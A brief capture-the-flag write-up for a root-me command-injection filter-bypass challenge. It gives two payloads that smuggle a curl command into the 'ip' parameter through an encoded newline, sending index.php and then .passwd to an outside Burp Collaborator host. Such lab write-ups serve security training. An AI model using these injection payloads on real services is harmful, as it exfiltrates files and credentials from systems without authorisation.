Command injection: filter bypassΒΆ
root-me challenge: Command injection - Filter bypass: Find a vulnerability in this service and exploit it. Some protections were added. The flag is in the index.php file.
Either use Burp Collaborator or one of its alternatives:
ip=127.0.0.1+%0A+curl+--data+"@index.php"+jobc0c724o9snp1oq21rh50ex53wrnfc.oastify.com
leading to:
ip=127.0.0.1+%0A+curl+-X+POST+--data+"@.passwd"+jobc0c724o9snp1oq21rh50ex53wrnfc.oastify.com
Last update:
2025-05-12 14:16